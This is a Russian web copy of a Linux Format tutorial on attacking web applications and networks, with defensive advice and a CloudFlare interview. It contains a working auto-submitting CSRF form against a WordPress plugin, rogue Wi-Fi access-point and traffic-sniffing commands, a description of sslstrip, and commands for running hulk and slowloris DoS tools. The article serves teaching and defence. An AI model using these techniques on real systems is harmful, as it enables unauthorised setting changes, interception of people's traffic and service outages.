В разных странах законы о хакерстве разные, и мы не можем дать конкретных юридических советов. Но будет обоснованно заявить, что применение любой из описываемых здесь технологий к сайту без разрешения от его владельца на таковое во многих странах является незаконным.
Если вы работаете в компании или в организации, у вас должно быть письменное разрешение от соответствующих должностных лиц на проведение указанных мероприятий. Так вы застрахуете себя от возможных проблем при недопонимании происходящего.
«Мы покажем вам хакерские инструменты изнутри.»
[править] СЕТИ
[править] Взлом WordPress
Атака на web-приложение.
По мере роста мощи HTML5 и скорости JavaScript, web-приложения распространяются все шире. Ubuntu и некоторые другие дистрибутивы обращаются с ними, как с приложениями первого ряда, а Mozilla создает смартфон, строящий все свои функции именно на них. Однако вместе с ними на передний план выходят уязвимости, которых раньше не было.
Мы рассмотрим данную область, используя в качестве примера WordPress – не потому, что это плохое приложение, а потому, что его популярность и способность к расширению сделали его мишенью для атак. Ни одна из описываемых здесь атак не уникальна для этой платформы, и они характерны для многих web-приложений, вне зависимости от того, построены ли они на CMS.
Поскольку мы предпочитаем показать, как работает атака, а не пояснять ее, мы создали виртуальную машину (ВМ), на которой работает уязвимая версия WordPress. Она имеется на диске, и ее можно скачать с www.linuxformat.com/content/downloads.
Обзаведясь ею, следуйте нижеприведенному пошаговому руководству по установке. Вам понадобится VirtualBox; в остальном она работает почти на любом дистрибутиве. Мы использовали формат блогов в WordPress, чтобы показать, как ее взломать, так что запускайте ее и приступайте.
Как только вы обнаружите атаку, блог также сообщит вам в подробностях, как защититься, чтобы проверить, удастся ли заделать дыры в системе безопасности, прежде чем двигаться дальше.
[править] Защитите себя
Если вы работаете в web-приложении, вы просто обязаны осознавать все риски. Уязвимости могут зайти дальше самого приложения, поскольку атакующему, возможно, удастся захватить контроль над сервером. Если вы используете готовое ПО (типа WordPress), неплохо запомнить такое правило:
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повыситьчем проще и стандартнее ПО, тем легче быть в курсе дел и постоянно поддерживать обновления. Всегда проверяйте, чтобы у вас была самая последняя версия всех программ.
Intrusion Detection Systems [Система Обнаружения Вторжения] и Intrusion Prevention Systems [Системы Предотвращения Вторжения] (IDSs и IPSs) помогают снизить ущерб, причиняемый атакующим, однако не стоит считать их этакими серебряными пулями, способными разрешить все ваши проблемы с безопасностью. И не менее важно, чтобы у вас были установлены и должным образом настроены SELinux или AppArmour.
Если вы используете специализированное web-приложение, вы должны быть уверены, что вам знакомы разные технологии, используемые атакующими. Отличный стартовый пункт – сайт OWASP (Open Source Web Applications Security Project – Проект безопасности web-приложений с открытым кодом), https://www.owasp.org. Если на вашем сайте хранятся важные данные, стоит посоветоваться со специалистом по поводу обеспечения безопасности их хранения.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
[править] Поиск уязвимостей
Как обнаружить и использовать слабую сторону вашего сайта.
Взглянув на ВМ LXF Vulnerable Machine, вы можете легко прийти к выводу, что использовать уязвимости очень легко, зная, где они есть, а вот как их найти? Чтобы ответить на этот вопрос, мы поставили себе задачу найти и использовать уязвимости на нашем сайте.
Во-первых, мы установили атакующий прокси. Этот инструмент перехватывает HTTP-запросы вашего браузера и использует их для создания карты сайта, который вы просматриваете. С его помощью вы можете понять, что же именно вы атакуете, даже если у вас нет доступа к исходному коду. Также он дает вам представление об информации, передаваемой между сервером и браузером.
Мы выбрали OWASP ZAP (он имеется на http://code.google.com/p/zaproxy и на DVD) – чтобы применить его, просто распакуйте его и запустите (устанавливать не надо) с помощью:
tar zxvf ZAP_2.0.0_Linux.tar.gz
cd ZAP_2.0.0
./zap.sh
Версии 2.0.0 требуется Java 1.7 или выше. Если у вас более ранняя версия (как по умолчанию в Ubuntu 12.04), вы можете использовать или ZAP версии 1.4.1, или самостоятельно найти версию Java поновее. На нашей машине с Precise Pangolin мы установили пакет openjdk-7-jre и изменили конечную строку с zap.sh на
exec /usr/lib/jvm/java-7-openjdk-i386/bin/java ${JMEM}-XX:PermSize=256M -jar “{BASEDIR}/zap.jar” org.zaproxy.zap.ZAP $*
Эта команда запустит работу прокси на порте 8080, и вам нужно настроить свой браузер, чтобы он пропускал свои данные через него. В Firefox это делается в Edit > Preferences, затем надо перейти в Advanced > Network > Settings и изменить переключатель на Manual Proxy Configuration с HTTP Proxy в качестве localhost и Port 8080.
Теперь вы должны увидеть одну или несколько записей Zap для каждой страницы, на которую вы заходите. Zap также попытается помочь вам, отмечая все пункты, которые он сочтет уязвимыми, цветным флажком – от желтого до красного, в зависимости от серьезности проблемы (по его мнению). Флажки голубого цвета просто отмечают информацию. Однако эту градацию надо принимать не без скепсиса. Многие из отмеченных флажками страниц вовсе не являются уязвимыми, а многие, наоборот, пропускаются (это обычная проблема со всеми автоматическими сканерами безопасности, которые мы встречали).
Настроив программу, мы можем начать атаку. Первая фаза любого теста на проникновение – это сбор информации. В ZAP есть инструменты для автоматического сканирования сайта, но мы предпочитаем начать с ручного сканирования. Это означает просмотр сайта через ваш web-браузер, в процессе которого ZAP составляет каталог. Чем подробнее вы рассматриваете сайт, тем больше информации вы получите.
Продвигаясь по приложению, мы ищем векторы атаки. В основном это способ передачи информации на сайт. В HTTP это происходит в двух видах: параметры, передаваемые по запросам GET (это биты, которые следуют за вопросительным знаком в URL), и запросы POST (их труднее увидеть без такого прокси, как ZAP, но они перечислены во вкладке Requests). Любые их них можно изменить так, чтобы они отправляли любую нужную нам информацию. Как вы видите на примере атак на блог WordPress, хорошо продуманные и организованные вредоносные данные могут иногда проскользнуть на сайт, если он не проверяет входящие данные должным образом.
Получив полное представление о своей жертве, можно приступать к поиску места для нашей атаки. Даже на таком простом сайте WordPress, как наш, есть сотни векторов, которые мы можем рассмотреть, но большинство не будут уязвимы. Частью искусства взлома сайтов является осознание того, на каких векторах стоит сконцентрироваться. Например, можно бы попробовать атаковать параметр page_id, имеющийся на большинстве страниц, но на WordPress он настолько важен, что явно подвергался тщательнейшему рассмотрению. Может, он и уязвим, но скорее всего сладить с ним не так-то просто. Лучше поискать слабости в менее используемых областях. Исторически сложилось, что дополнения всегда были куда более плодотворной почвой для атакующего, чем основное приложение.
[править] Подделка межсайтовых запросов
Мы обратили внимание, что ZAP перечислил ряд страниц, уязвимых для подделки межсайтовых запросов (Cross Site Request Forgery, CSRF), во вкладке Alerts. Это способ атаки, при котором вы обманным путем заставляете web-приложение принять входящие данные, создавая другой сайт, который имитирует HTTP-запрос web-приложения. Если после этого аутентифицированный пользователь откроет ваш вредоносный сайт, его браузер отправит его аутентификационные cookie, благодаря которым ваш вредоносный запрос HTTP будет выполнен пользователем (не переживайте, если это все показалось вам темным: все станет ясно по мере того, как мы будем разбирать суть атаки).
Обычно WordPress останавливает этот вид атаки с помощью “nonce”. Это случайным образом выбранное число, направляемое в браузер при создании формы. Если с данными формы назад на сервер передается то же число, сервер знает, что форма представлена пользователем на сайте. Если нет – сервер понимает, что форма представлена другим сайтом, и просто сбрасывает данные. Однако мы заметили, что на одной из страниц нет nonce – в простом запросе HTTP POST, разрешенном с помощью cookie. А значит, любая форма HTML (независимо от того, на каком сайте она была) может представить данные этой части приложения. Выглядело идеальной целью для CSRF-атаки. Обсуждаемая страница была настройками для Ungallery (запрос см. на рис. 1).
Хитрость теперь заключалась в создании новой страницы, которая бы генерировала идентичный запрос HTTP. Это был запрос POST, и именно его проще всего подделать с помощью формы HTML. Мы создали новый файл, содержащий следующее:
<html>
<head>
<title>Test site for csrf in Ungallery</title>
</head>
<body>
<form action=”http://site-url/wp-admin/options-general.php?page=ungallerysettings” method=”POST”>
<input type=”hidden” name=”mt_submit_hidden” value=”Y”>
<input type=”hidden” name=”images_path” value=”%2Froot%2Fimages%2F”>
<input type=”hidden” name=”URI” value=”http%3A%2F%2F 192.168.133.143%2F”>
<input type=”hidden” name=”gallery” value=”%3Fpage_id%3D9”>
<input type=”hidden” name=”cache_dir” value=”%2Fvar%2F www%2Fwordpress%2Fwp-content%2Fcache%2F”>
<input type=”hidden” name=”columns” value=”5”>
<input type=”hidden” name=”thumbnail” value=”190”>
<input type=”hidden” name=”browse_view” value=”440”>
<input type=”hidden” name=”hidden” value=”hidden”>
<input type=”hidden” name=”gallery2” value=””>
<input type=”hidden” name=”images2_path” value=””>
<input type=”hidden” name=”gallery3” value=””>
<input type=”hidden” name=”images3_path” value=””>
<input type=”hidden” name=”gallery4” value=””>
<input type=”hidden” name=”images4_path” value=””>
<input type=”hidden” name=”gallery5” value=””>
<input type=”hidden” name=”images5_path” value=””>
<input type=”hidden” name=”gallery6” value=””>
<input type=”hidden” name=”images6_path” value=””>
<input type=”hidden” name=”Submit” value=”Save+Changes”>
</form>
<script>document.forms[0].submit();</script>
</body>
</head>
Как вы можете видеть, это новая форма HTML, которая представляет данные на страницу настроек Ungallery. Поскольку здесь нет nonce, Ungallery автоматически примет его, если будет иметь соответствующий cookie. Если некто с правами администратора откроет файл, он может изменить настройки. При настоящей атаке это можно сделать, отправив по электронной почте завлекательную ссылку администратору или оставив где-нибудь в общественном месте флэшку USB со скриптом autorun. Конечно, это не самая вредоносная атака, но ею можно воспользоваться, чтобы сделать открытыми изображения, которые должны были хранится в секрете.
История на этом, конечно же, не заканчивается. Мы в Linux Format придерживаемся политики ответственного разглашения. Это означает, что хотя мы и рады публиковать подробную информацию об уязвимостях, все же сначала мы обязательно извещаем разработчика.
Как видите, процесс обнаружения уязвимостей требует знания того, что именно искать, и нахождения приложений для этого. Это может быть долгий и медленный процесс. Есть автоматические сканеры (вроде того, что включен в ZAP), но все же намного лучше делать это вручную – так виднее, что происходит. Многие тестировщики на проникновение предпочитают ручную работу, это позволяет им добиваться куда лучших результатов, чем автоматическим сканерам.
[править] Посредник
Как подвергнуть атаке отдельный web-браузер.
Пока мы рассмотрели только атаку на сайт, но это лишь половина истории. Мы можем также подвергнуть атаке человека, который находится в сети. Одним из способов сделать это является XSS (например, тот, что возможен в ВМ WordPress), но мы сейчас сконцентрируемся на хищении данных.
Для этого есть несколько способов. Например, можно установить на компьютер вредоносное ПО и использовать его для перехвата сетевого трафика. Однако в нашей статье мы воспользуемся простейшим способом: разместим вредоносный компьютер между жертвой и Интернетом, чтобы весь трафик шел через него. Это называется атакой типа «Посредник» (Man In The Middle, MITM). Можете совершить ее с помощью сетевых кабелей, можете даже виртуально совершить ее с помощью атаки ARP-spoofing; ну, а мы обратимся к Wi-Fi.
Как и все атаки, описанные в этой статье, злоупотребление данной атакой является незаконным в большинстве стран. Это не означает злоупотребление данными, это означает кражу данных как таковую.
Чтобы протестировать атаку, мы взяли нетбук, подключенный к Ethernet, для создания беспроводной точки доступа – люди пользуются такими для соединения с сетью в кафе, даже не задумываясь о безопасности.
Во-первых, нужна программа настройки точки доступа. Мы использовали hostapd. Она имеется в репозиториях некоторых дистрибутивов, и доступна на http://hostap.epitest.fi/hostapd/. Вам также понадобится DHCP-сервер – он позволит убедиться, что клиенты, соединенные с вашей точкой доступа, могут получить IP-адреса. Мы использовали dhcpd3 (из пакета dhcpd3-server в Ubuntu).
Обеим программам нужны файлы настройки. Файлы для примера вы найдете в tar-архиве кода онлайн на www.linuxformat.com/archive.
Установив программу и найдя файл настройки, настройте свою точку доступа с помощью
sudo hostapd –Bdd hostapdl.conf
sudo dhcpd -4 –cf dhcp2.conf wlan0
Возможно, придется добавить путь к двум файлам .conf, если их нет в текущей директории.
Вам нужно велеть своей машине перенаправить интернет- соединения на другое сетевое соединение; в противном случае любая машина, которая соединяется с вами, не сможет получить доступ к Интернет.
sudo bash
echo “1” >/proc/sys/net/ipv4/ip_froward
iptables –t nat –A POSTROUTING –o eth0 –j MASQUERADE
Вероятно, самое удивительное в Интернете то, что большая часть информации не шифруется. Она просто отправляется как обычный текст, который может прочитать любой MITM без всяких проблем со взломом шифра.
Wireshark – отличный инструмент для просмотра данных, проходящих через ваш вредоносный компьютер на уровне пакетов, но большую часть времени нам не нужно углубляться до этого уровня. Вместо этого можно использовать justniffer для воссоздания всего сетевого трафика, проходящего через нашу вредоносную точку доступа.
Обычно этот инструмент не включается в репозитории дистрибутивов. Чтобы установить его в Ubuntu, добавьте PPA:
sudo add-apt-repository ppa:oreste-notelli/ppa
sudo apt-get update
sudo apr-get install justniffer
В других дистрибутивах придется компилировать его самостоятельно. Подробности см. на http://justniffer.sourceforge.net/#!/install
Есть ряд опций, позволяющих выполнять самые разные виды сетевого мониторинга. Мы собираемся использовать его способность воссоздавать web-страницы, которые он видит. Сначала создайте директорию данных. В данном примере она будет в домашней директории автора, но может находиться где угодно (неплохо разместить ее на отдельном диске, если вы планируете оставить ее работать на некоторое время).
mkdir /home/ben/data
sudo justniffer-grab-http-traffic -d /home/ben/data -U ben -i wlan0
В обоих строках нужно заменить ben на свое имя пользователя. Опция -U командует, под каким пользователем сохранять файлы.
Если вы соединились с точкой доступа через компьютер, планшет или телефон и бродите по сети, вы должны видеть директорию данных, заполняемую файлами для каждой просмотренной незашифрованной страницы. Сюда входит содержание всех прочитанных писем, переданных без использования HTTPS (Gmail использует его, и поэтому письма с него не будут прочитаны; а большинство остальных сайтов– нет).
Конечно, не все, что вы хотите перехватить, проходит через HTTP, и многие другие популярные протоколы тоже не зашифрованы (например, FTP и Telnet). На ваше счастье, есть и инструменты, способные помочь вам атаковать их. Например, dsniff (http://monkey.org/~dugsong/dsniff) вытащит из сетевого трафика все незашифрованные пароли.
Оба эти инструмента пассивны, то есть просто делают копии данных, никак иначе на них не воздействуя. Мы можем несколько изменить ситуацию, но для этого придется прибегнуть к активной атаке, в частности, к sslstrip.
sslstrip использует саму суть сетевых ссылок и тот факт, что некоторые страницы зашифрованы, а некоторые – нет. В основном он отслеживает весь незашифрованный трафик и ждет ссылки или переадресации на сайты HTTPS, а затем начинает атаку MITM: sslstrip запрашивает безопасную версию сайта и выдает ее браузеру в виде простого HTTP.
Сайт может заблокировать подобную атаку, однако в цели нашей статьи не входит рассмотрение этого процесса. Однако мы обнаружили, что некоторые популярные сайты (включая Facebook и Yahoo) оказались уязвимы. Мы сообщили об этой проблеме командам безопасности этих сайтов. Facebook нам ответил, что они рекомендуют включить настройки безопасности браузера. Однако остановить атаку им не удастся, и когда мы сообщили об этом, нам ничего не ответили. А от Yahoo ответа вообще не поступило.
[править] Шифруйтесь
Вы можете рассматривать Интернет как своего рода почтовый сервис. Обычно данные передаются незашифрованными, и это похоже на пересылку открытки. Прочитать ее может множество людей, с момента отправки и до момента доставки, и то же можно сказать и об информации, отправляемой через HTTP, FTP, Telnet. Иногда это не имеет значения – вам, вероятно, наплевать, если почтальон вашей бабушки узнает, что над всей Испанией безоблачное небо – но иногда и важно; и вы вряд ли захотите, чтобы почтальон узнал ваши банковские реквизиты. То же самое можно сказать и о данных онлайн. Если вы не хотите, чтобы ваши данные были доступны для широкой публики, используйте зашифрованный протокол (HTTPS, SFTP, SSH, SCP и т. п.).
Чтобы несколько упростить эту задачу, Electronic Frontier Foundation (EFF) создали расширение для Firefox (версия для Chrome находится на альфа-стадии разработки) под названием HTTPS Everywhere. Оно обеспечивает использование по умолчанию зашифрованной версии сайта, если таковая существует. Если у сайта нет зашифрованной версии, то оно будет работать с незашифрованной, так что бдительность терять все равно не советуем.
Как мы видели благодаря sslstrip, нужно быть крайне осторожным при использовании открытой сети, даже если сайт зашифрован. Прежде чем вводить какую-либо информацию, убедитесь, что вы используете HTTPS.
Зашифрованные протоколы сохраняют конфиденциальность данных, но они не скрывают, какие серверы вы используете. Например, злоумышленник может узнать, что вы используете gmail.com, но не сможет узнать, под каким именем пользователя вы работаете или какие сообщения по электронной почте получаете или отправляете. Если помимо шифрования вам нужна и анонимность, пользуйтесь VPN или Tor (https://www.torproject.org/). Помните, что для обеспечения должной защиты и в этом случае все равно надо использовать протокол с шифрованием.
> sstrtip сохраняет копию всего незашифрованного трафика. Обычная команда grep может найти любые данные идентификации (не радуйтесь: это не настоящие учетные записи).
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
[править] DDoS
Сокрушите намеченный сервер.
Distributed Denial of Service (DDoS), вероятно, самый разрекламированный вид атаки за последнее время. Anonimous и прочие хакерствующие коллективы прибегали к нему для атак на правительства, финансовые учреждения и прочие организации, которые в чем-то им насолили. Хоть это и не так рекламировалось, но DOS также стал оружием, которое использовали криминальные элементы. Однако прежде чем говорить о причинах этого, давайте рассмотрим, что такое DDoS-атаки и как они работают.
В общих чертах, DDoS-атака не позволяет серверу выполнять свои обычные функции, отказывая таким образом пользователям в обслуживании. Обычно это web-сервер, но необязательно. Это делается не посредством взлома компьютера или получения доступа, а перегрузкой сервера большим потоком запросов.
Например, атакующий может перегрузить сетевое соединение сервера фиктивными данными, и никакие полезные пакеты проскользнуть не смогут, или он может захватить все циклы CPU, и сервер не сможет обрабатывать другие запросы.
Поскольку большинство современных серверов имеют высокую пропускную способность, мощные CPU и большое количество памяти, как правило, их не очень-то перегрузишь только с помощью домашнего широкополосного соединения. Чтобы добиться этого, атакующие часто используют несколько компьютеров для одновременной атаки на цель. В случае хактивистов это делается группой сочувствующих; в случае преступных элементов, это часто делается ботнетами.
Есть множество инструментов, способных помочь вам провести тест на DDOS. Любимейший инструмент Anonimous – High Orbit Ion Cannon, поскольку он прост для неискушенных пользователей. Однако мы рассмотрим hulk. Его можно найти на http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html. Чтобы запустить hulk, просто распакуйте его и скомандуйте:
unzip hulk zip
python hulk py http://<site>
Чтобы протестировать его, можно скоренько настроить сервер HTTP с помощью
python -m SimpleHTTPServer
и затем атаковать его командой
python hulk.py http://<ip address>:8000
Мы обнаружили, что это вполне эффективно обрушивает сайт. Но есть очевидная разница между обрушением небольшого web-сервера на Python и выбивание солидного сервера Apache в режим оффлайн. Hulk просто пытается закидать машину запросами. Теперь мы рассмотрим другой инструмент, более разумный. Slowlories (он есть на http://ha.ckers.org/slowloris/ или на DVD) работает, пытаясь удержать как можно больше соединений открытыми, с целью исчерпать ресурсы сервера. Это требует намного меньшей полосы вещания, чем атака грубой силы в стиле hulk, однако не все серверное ПО является уязвимым. Чтобы запустить slowlories, просто сделайте файл исполняемым и затем вызовите его с помощью:
chmode a+x slowlories.pl
./slowris.pl -dns <site>
И снова наш сервер на Python сдался мгновенно.
[править] Защищайтесь
Защита от DDoS-атаки заключается в минимизации ущерба от каждого вредоносного пакета. Другими словами, надо остановить как можно больше таких пакетов, как только они появятся в вашей сети. Для этого нужен брандмауэр и умение его настроить, чтобы он определял и отбрасывал соответствующие пакеты.
Как именно вы это сделаете, зависит от брандмауэра, и подходящие правила будут постоянно меняться в вечной охоте кошки за мышью, когда атакующий будет менять свои пакеты, чтобы обойти ваш брандмауэр. Однако мы скажем вот что: узнайте, как защитить себя, до того, как подвергнетесь атаке! Пробуйте всевозможные предлагаемые инструменты DDoS и практикуйтесь в искусстве их блокировать, потому что вряд ли вам понравится учиться этому после того, как ваш сайт рухнет. Работа с инструментами DDoS – также отличный способ узнать, как будет себя вести ваш сайт под пиковой нагрузкой.
В порядке альтернативы, можно поместить свой сервер в сеть, способную позаботиться о нем вместо вас. Такие провайдеры, как CloudFlare, поместят ваш сервер за свой брандмауэр (виртуально, вам не нужно заново соединяться с сервером). А значит, вам не придется беспокоиться о тонкостях настойки брандмауэра.
> Лори медленные [Slow lories] — тип приматов, обитающих в Южной и Юго-Восточной Азии. Если хотите узнать, как они выглядят, просто откройте файл Perl в текстовом редакторе.
«Ряд крупнейших из наблюдаемых атак – по сути, вымогательство онлайн»
Израильтяне и палестинцы согласны в одном: в выборе защитника от DDoS-атак. И вот мы встретились с Мэтью Принсом, руководителем и соучредителем CloudFlare, чтобы выяснить, как же он пытается опережать онлайн-злоумышленников.
Linux Format: Вы замечали, что география онлайн-атак со временем меняется?
Мэтью Принс [Matthew Prince]: Мы с моим соучредителем начали работать над проблемами сетевой безопасности в 2003 году, запустив проект Honey Pot. Целью было отслеживать онлайновые мошенничества с кредитными картами, и в первую очередь мы отслеживали, как спамеры крадут адреса электронной почты с сайтов. В те времена лучшим способом для плохих парней сделать деньги онлайн было стать спамером или трудиться на ниве спама. Мне кажется, эта ситуация меняется. Эта сфера все еще весьма прибыльна, но уже не так, как раньше. В спаме есть одна интересная вещь: чтобы их не обнаружили, спамеры стали использовать ресурсы создателей вирусов [компьютеры, которые были частью ботнета] для своих рассылок. По мере того, как с годами улучшались фильтры спама и спам становился менее прибыльным, мы увидели, как те же самые ресурсы ботнета стали использоваться для ряда других атак. Таким образом, по сути мы сейчас имеем дело с той же проблемой, что и в 2003-м: имеются зараженные машины, и они используются, чтобы создать еще большие проблемы. В 2003-м это был спам, в 2012-м стал DDoS. Однако ресурсы, которыми онлайн-злоумышленники пользуются для запуска атаки, последние 10 лет остаются все теми же.
LXF: В чем самая большая угроза для онлайн-бизнеса?
МП: Мне кажется, очень сильно выросло как количество атак [DDoS], так и их размер. Мы наблюдаем регулярные атаки, превышающие 50 или 60 ГБ/с, которым подвергается наша сеть. У нас крупная и мощная сеть, и мы справляемся с атаками в несколько сотен ГБ, но, знаете ли, 50 или 60 гигов – это больше, чем могут отправить самые крупные хостинг-провайдеры. Я не знаю ни одного банка с подобным трафиком. С этим трудно справиться, потому что немного найдется ресурсов оборудования, которые можно было бы задействовать, чтобы прекратить такую атаку. Неважно, крупное у вас предприятие или мелкое, зарабатывающее онлайн, я полагаю, что масштаб и объем ныне наблюдаемых DDoS-атак внушает серьезные опасения для множества предприятий.
LXF: Вы исследуете причины этих атак?
МП: Мы не особо тратим время на выяснение причин и того, кто за этим стоит, хотя, конечно, получаем информацию от клиентов насчет того, что, по их мнению, послужило мотивом; и мотивы очень разные. Мы видели атаки по коммерческим соображениям. Бывают случаи, когда атака заказана конкурентом. Ряд крупнейших из наблюдаемых атак – по сути, вымогательство онлайн, когда некий злоумышленник отправляет электронной почтой на среднего (обычно) размера сайт e-commerce сообщение примерно такого содержания: «либо вы платите нам энную сумму, либо мы перекрываем вам доступ в Интернет». Количество подобных атак растет постоянно.
К нам обращался чеченский новостной сайт, атакованный российскими правительственными учреждениями или кем-то, сочувствующим российским правительственным учреждениям. У нас есть клиенты с обеих сторон ближневосточного конфликта. Нашими услугами пользуются израильские, палестинские и египетские сайты – на многие из них совершались масштабные атаки, и все с политической подоплекой. WikiLeaks также пользовалась [CloudFlare], для прекращения масштабных атак отказа в обслуживании. Хотя атаки хактивистов наиболее популярны в прессе, в основном они не самые крупномасштабные. Выясняется, что самые крупные атаки имеют определенную правительственную поддержку – вот те бывают действительно крупными. Или те, что являются онлайн-вымогательством. Мы видели атаки на сайты эскорт-услуг, когда ряд тружениц секса решил избавиться от сутенеров, а сутенеры стали их преследовать. В принципе, любой, у кого есть на вас зуб и ресурсы, чтобы доставить вам неприятности, может в наше время организовать довольно солидную атаку, способную вышибить оффлайн даже крупную организацию. Полную версию интервью см. на www.tuxradar.com/content/mpivew. |